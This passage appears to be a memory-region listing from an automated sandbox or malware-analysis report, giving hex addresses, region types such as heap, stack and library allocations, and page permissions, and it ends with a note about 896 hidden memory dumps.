page read and write
2885000
trusted library allocation
page read and write
260D000
trusted library allocation
page read and write
2B57000
trusted library allocation
page read and write
38D000
heap
page read and write
2B93000
trusted library allocation
page read and write
F2000
heap
page read and write
2B55000
trusted library allocation
page read and write
270C000
trusted library allocation
page read and write
2821000
trusted library allocation
page read and write
2B9A000
trusted library allocation
page read and write
29FC000
trusted library allocation
page read and write
277C000
trusted library allocation
page read and write
2826000
trusted library allocation
page read and write
3F63000
trusted library allocation
page read and write
2729000
trusted library allocation
page read and write
29CF000
trusted library allocation
page read and write
282C000
trusted library allocation
page read and write
178000
stack
page read and write
33D3000
trusted library allocation
page read and write
1C495000
heap
page read and write
27A5000
trusted library allocation
page read and write
13B000
heap
page read and write
634000
heap
page read and write
2BFF000
trusted library allocation
page read and write
2AE1000
trusted library allocation
page read and write
260B000
trusted library allocation
page read and write
2A51000
trusted library allocation
page read and write
28CC000
trusted library allocation
page read and write
7FE8B8D3000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
8DE000
stack
page read and write
264E000
trusted library allocation
page read and write
4F0000
heap
page read and write
21F0000
heap
page read and write
1180000
unkown
page readonly
2A68000
trusted library allocation
page read and write
28C6000
trusted library allocation
page read and write
2754000
trusted library allocation
page read and write
26A7000
trusted library allocation
page read and write
28E9000
trusted library allocation
page read and write
2C55000
trusted library allocation
page read and write
24E9000
trusted library allocation
page read and write
3D0000
trusted library allocation
page read and write
1C410000
heap
page read and write
10000
heap
page read and write
3C9E000
stack
page read and write
27A7000
trusted library allocation
page read and write
28ED000
trusted library allocation
page read and write
FA000
heap
page read and write
280C000
trusted library allocation
page read and write
1C4B5000
heap
page read and write
2C01000
trusted library allocation
page read and write
29CB000
trusted library allocation
page read and write
1A92E000
stack
page read and write
2C2B000
trusted library allocation
page read and write
28B1000
trusted library allocation
page read and write
2637000
trusted library allocation
page read and write
2B89000
trusted library allocation
page read and write
134000
heap
page read and write
2631000
trusted library allocation
page read and write
370D000
trusted library allocation
page read and write
8E0000
trusted library allocation
page execute and read and write
26AD000
trusted library allocation
page read and write
1A80D000
heap
page read and write
390000
heap
page read and write
7FE8B806000
trusted library allocation
page execute and read and write
2780000
trusted library allocation
page read and write
2C48000
trusted library allocation
page read and write
29B0000
trusted library allocation
page read and write
7FE8B902000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
2AAF000
trusted library allocation
page read and write
29FE000
trusted library allocation
page read and write
27C7000
trusted library allocation
page read and write
2A98000
trusted library allocation
page read and write
1A44D000
stack
page read and write
28C3000
trusted library allocation
page read and write
2A19000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
287B000
trusted library allocation
page read and write
120000
trusted library allocation
page read and write
1C4F0000
heap
page read and write
C30000
heap
page execute and read and write
2694000
trusted library allocation
page read and write
47A0000
trusted library section
page read and write
2464000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
28D6000
trusted library allocation
page read and write
272B000
trusted library allocation
page read and write
247D000
trusted library allocation
page read and write
2805000
trusted library allocation
page read and write
390000
heap
page read and write
2A62000
trusted library allocation
page read and write
6E0000
heap
page read and write
2937000
trusted library allocation
page read and write
2742000
trusted library allocation
page read and write
254F000
stack
page read and write
1A815000
heap
page read and write
288E000
trusted library allocation
page read and write
D00000
trusted library allocation
page read and write
2999000
trusted library allocation
page read and write
277E000
trusted library allocation
page read and write
2883000
trusted library allocation
page read and write
7FE8B930000
trusted library allocation
page read and write
2864000
trusted library allocation
page read and write
2756000
trusted library allocation
page read and write
2B25000
trusted library allocation
page read and write
27DD000
trusted library allocation
page read and write
1C46E000
heap
page read and write
2C1A000
trusted library allocation
page read and write
2723000
trusted library allocation
page read and write
7FE8B910000
trusted library allocation
page execute and read and write
6C1000
heap
page read and write
280B000
trusted library allocation
page read and write
279F000
trusted library allocation
page read and write
1C4D7000
heap
page read and write
2C52000
trusted library allocation
page read and write
276F000
trusted library allocation
page read and write
26D5000
trusted library allocation
page read and write
1549B000
trusted library allocation
page read and write
617000
heap
page read and write
270E000
trusted library allocation
page read and write
29F8000
trusted library allocation
page read and write
3F0000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
526000
heap
page read and write
D5E000
stack
page read and write | page guard
273C000
trusted library allocation
page read and write
2C67000
trusted library allocation
page read and write
400000
heap
page read and write
2927000
trusted library allocation
page read and write
7FE8B840000
trusted library allocation
page execute and read and write
1239F000
trusted library allocation
page read and write
408000
stack
page read and write
21A000
heap
page read and write
278D000
trusted library allocation
page read and write
2795000
trusted library allocation
page read and write
2A6A000
trusted library allocation
page read and write
285E000
trusted library allocation
page read and write
25C4000
trusted library allocation
page read and write
2C03000
trusted library allocation
page read and write
2B27000
trusted library allocation
page read and write
290C000
trusted library allocation
page read and write
26F1000
trusted library allocation
page read and write
34EC000
trusted library allocation
page read and write
4DF000
heap
page read and write
17B000
stack
page read and write
27C4000
trusted library allocation
page read and write
2AB5000
trusted library allocation
page read and write
27D5000
trusted library allocation
page read and write
6D0000
trusted library allocation
page execute and read and write
2A9A000
trusted library allocation
page read and write
7FE8BA60000
trusted library allocation
page read and write
2A7B000
trusted library allocation
page read and write
246C000
trusted library allocation
page read and write
7FE8B920000
trusted library allocation
page read and write
26D7000
trusted library allocation
page read and write
29CD000
trusted library allocation
page read and write
4980000
trusted library allocation
page execute and read and write
49FF000
stack
page read and write
34DA000
trusted library allocation
page read and write
27A3000
trusted library allocation
page read and write
600000
trusted library allocation
page execute and read and write
3750000
trusted library allocation
page read and write
2ABB000
trusted library allocation
page read and write
2AE9000
trusted library allocation
page read and write
1C90000
trusted library allocation
page read and write
2869000
trusted library allocation
page read and write
9F0000
trusted library allocation
page read and write
26F7000
trusted library allocation
page read and write
6DE000
heap
page read and write
3750000
trusted library allocation
page read and write
2A96000
trusted library allocation
page read and write
2AD8000
trusted library allocation
page read and write
2A4F000
trusted library allocation
page read and write
2A09000
trusted library allocation
page read and write
11A000
heap
page read and write
2976000
trusted library allocation
page read and write
2A81000
trusted library allocation
page read and write
5440000
trusted library allocation
page read and write
2483000
trusted library allocation
page read and write
259B000
trusted library allocation
page read and write
7FE8B724000
trusted library allocation
page read and write
2813000
trusted library allocation
page read and write
1AA0F000
stack
page read and write
1F0000
heap
page read and write
2946000
trusted library allocation
page read and write
28D8000
trusted library allocation
page read and write
2A7F000
trusted library allocation
page read and write
2ABE000
trusted library allocation
page read and write
2460000
trusted library allocation
page read and write
2BF5000
trusted library allocation
page read and write
2885000
trusted library allocation
page read and write
2BBF000
trusted library allocation
page read and write
2A35000
trusted library allocation
page read and write
26EF000
trusted library allocation
page read and write
296F000
trusted library allocation
page read and write
25CF000
trusted library allocation
page read and write
2AB3000
trusted library allocation
page read and write
7FE8B72D000
trusted library allocation
page execute and read and write
374000
heap
page read and write
28A3000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
690000
trusted library allocation
page read and write
7FE8B730000
trusted library allocation
page read and write
1A794000
heap
page read and write
2C6D000
trusted library allocation
page read and write
2B87000
trusted library allocation
page read and write
1A668000
heap
page execute and read and write
28A7000
trusted library allocation
page read and write
2C69000
trusted library allocation
page read and write
26F3000
trusted library allocation
page read and write
275B000
trusted library allocation
page read and write
1182000
unkown
page execute read
C50000
trusted library allocation
page execute and read and write
3F21000
trusted library allocation
page read and write
4152000
trusted library allocation
page read and write
1C4B7000
heap
page read and write
7FE8BA40000
trusted library allocation
page read and write
24A8000
trusted library allocation
page read and write
2B85000
trusted library allocation
page read and write
27F8000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
27A1000
trusted library allocation
page read and write
F0000
heap
page read and write
26AB000
trusted library allocation
page read and write
1C170000
heap
page read and write
2612000
trusted library allocation
page read and write
50B000
heap
page read and write
2881000
trusted library allocation
page read and write
3311000
trusted library allocation
page read and write
9FF000
trusted library allocation
page read and write
2862000
trusted library allocation
page read and write
123A1000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
10000
heap
page read and write
2B23000
trusted library allocation
page read and write
281F000
trusted library allocation
page read and write
27A9000
trusted library allocation
page read and write
2A33000
trusted library allocation
page read and write
25D3000
trusted library allocation
page read and write
25F2000
trusted library allocation
page read and write
287B000
trusted library allocation
page read and write
2CD000
trusted library allocation
page execute and read and write
7FE8B960000
trusted library allocation
page read and write
278B000
trusted library allocation
page read and write
2C16000
trusted library allocation
page read and write
2935000
trusted library allocation
page read and write
2C31000
trusted library allocation
page read and write
3E0000
trusted library allocation
page read and write
2C0000
trusted library allocation
page read and write
1C90000
heap
page read and write
29C0000
trusted library allocation
page read and write
24C7000
trusted library allocation
page read and write
2B97000
trusted library allocation
page read and write
29F4000
trusted library allocation
page read and write
2862000
trusted library allocation
page read and write
2692000
trusted library allocation
page read and write
2894000
trusted library allocation
page read and write
2BE2000
trusted library allocation
page read and write
7FE8B980000
trusted library allocation
page read and write
28C8000
trusted library allocation
page read and write
25E4000
trusted library allocation
page read and write
24A4000
trusted library allocation
page read and write
CFD000
stack
page read and write
26CA000
trusted library allocation
page read and write
28A9000
trusted library allocation
page read and write
28E3000
trusted library allocation
page read and write
249A000
trusted library allocation
page read and write
3F2F000
trusted library allocation
page read and write
4C10000
trusted library section
page read and write
7FE8B990000
trusted library allocation
page read and write
268C000
trusted library allocation
page read and write
7FE8BA30000
trusted library allocation
page read and write
2B5C000
trusted library allocation
page read and write
26B000
stack
page read and write
26D9000
trusted library allocation
page read and write
7FE8B9B0000
trusted library allocation
page read and write
10000
heap
page read and write
1E54000
heap
page read and write
26C8000
trusted library allocation
page read and write
29A5000
trusted library allocation
page read and write
26A3000
trusted library allocation
page read and write
2956000
trusted library allocation
page read and write
2BFD000
trusted library allocation
page read and write
3B0000
trusted library allocation
page read and write
20000
heap
page read and write
2633000
trusted library allocation
page read and write
1C3A3000
heap
page read and write
290000
heap
page read and write
2665000
trusted library allocation
page read and write
2833000
trusted library allocation
page read and write
3F1E000
trusted library allocation
page read and write
2639000
trusted library allocation
page read and write
3B0000
trusted library allocation
page read and write
1A790000
heap
page read and write
24DC000
trusted library allocation
page read and write
2667000
trusted library allocation
page read and write
1E50000
heap
page read and write
2969000
trusted library allocation
page read and write
7FE8B733000
trusted library allocation
page read and write
28DA000
trusted library allocation
page read and write
7FE8BA50000
trusted library allocation
page read and write
24CB000
trusted library allocation
page read and write
2A94000
trusted library allocation
page read and write
2710000
trusted library allocation
page read and write
268E000
trusted library allocation
page read and write
29C2000
trusted library allocation
page read and write
33FB000
trusted library allocation
page read and write
2A26000
trusted library allocation
page read and write
266F000
trusted library allocation
page read and write
13B000
heap
page read and write
289A000
trusted library allocation
page read and write
2A2A000
trusted library allocation
page read and write
28F3000
trusted library allocation
page read and write
2BC1000
trusted library allocation
page read and write
285E000
trusted library allocation
page read and write
274C000
trusted library allocation
page read and write
266B000
trusted library allocation
page read and write
D50000
trusted library allocation
page execute and read and write
1C466000
heap
page read and write
7FE8B928000
trusted library allocation
page read and write
279D000
trusted library allocation
page read and write
10000
heap
page read and write
2848000
trusted library allocation
page read and write
486E000
stack
page read and write
2A47000
trusted library allocation
page read and write
7FE8B8C0000
trusted library allocation
page read and write
2AD2000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
186000
trusted library allocation
page execute and read and write
24E2000
trusted library allocation
page read and write
192000
trusted library allocation
page read and write
C1F000
stack
page read and write
18A000
trusted library allocation
page execute and read and write
2BF9000
trusted library allocation
page read and write
7FE8BA00000
trusted library allocation
page read and write
2841000
trusted library allocation
page read and write
2908000
trusted library allocation
page read and write
AE000
heap
page read and write
300000
trusted library allocation
page read and write
2B29000
trusted library allocation
page read and write
263B000
trusted library allocation
page read and write
7FE8B7D6000
trusted library allocation
page read and write
286B000
trusted library allocation
page read and write
25DF000
trusted library allocation
page read and write
246A000
trusted library allocation
page read and write
281B000
trusted library allocation
page read and write
2B8F000
trusted library allocation
page read and write
4D0000
trusted library allocation
page read and write
2BC5000
trusted library allocation
page read and write
29C4000
trusted library allocation
page read and write
2B4000
trusted library allocation
page read and write
2C12000
trusted library allocation
page read and write
3E0000
trusted library allocation
page read and write
2481000
trusted library allocation
page read and write
7FE8B924000
trusted library allocation
page read and write
2896000
trusted library allocation
page read and write
2A90000
trusted library allocation
page read and write
123C1000
trusted library allocation
page read and write
2815000
trusted library allocation
page read and write
1C428000
heap
page read and write
2868000
trusted library allocation
page read and write
2BE6000
trusted library allocation
page read and write
There are 896 hidden memdumps, click here to show them.